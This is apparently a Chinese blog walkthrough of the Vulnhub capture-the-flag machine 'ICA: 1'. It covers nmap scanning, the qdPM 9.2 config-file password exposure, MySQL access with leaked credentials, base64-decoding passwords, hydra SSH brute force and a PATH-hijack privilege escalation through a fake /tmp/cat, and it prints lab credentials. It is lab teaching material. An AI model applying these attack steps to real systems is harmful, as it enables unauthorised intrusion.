Vulnhub-ICA: 1
描述
- Name: ICA: 1
 - Date release: 25 Sep 2021
 - Author: onurturali
 - Series: ICA
 
According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We will place a backdoor to access the system later. You just focus on what the project is. You will probably have to go through several layers of security. The Agency has full confidence that you will successfully complete this mission. Good Luck, Agent!
Difficulty: Easy
This works better with VirtualBox rather than VMware
扫不到ip
路径:
vim /etc/network/interfaces修改网卡为:
ens33重启

nmap信息收集

1  | kali 192.168.169.220  | 
靶机IP扫描

- 80 3306 33060
 
访问网页


搜索可以利用的框架


1  | # Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)  | 
1  | http://192.168.169.230/core/config/databases.yml  | 

1  | all:  | 
连接数据库
1  | mysql -h 192.168.169.230 -uqdpmadmin -pUcVQCMQk2STVeS6J  | 
探索数据库

- qdpm 没有用到的东西
 

- staff
 

- 分别保存爆破
 
user.txt
1  | smith  | 
pass.txt
1  | c3VSSkFkR3dMcDhkeTNyRg==  | 
- 解密
 
1  | base64 -d pass.txt > passwd.txt  | 

爆破
1  | hydra -L u.txt -P passwd.txt 192.168.169.230 ssh  | 

1  | [22][ssh] host: 192.168.169.230 login: travis password: DJceVy98W28Y7wLg  | 
travis


dexter


strings命令把/opt/get_access的字符串全部打印出来

提权
- 这个cat命令它并没有指定是哪个文件夹下的cat命令所以我们可以创建一个名为cat的文件,内容写上”/bin/bash”,然后把它添加到环境变量,就可以提权了
 
1  | echo '/bin/bash' > /tmp/cat  | 

- 得到root权限,查看flag,此时 cat 用不了
 


结束
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!

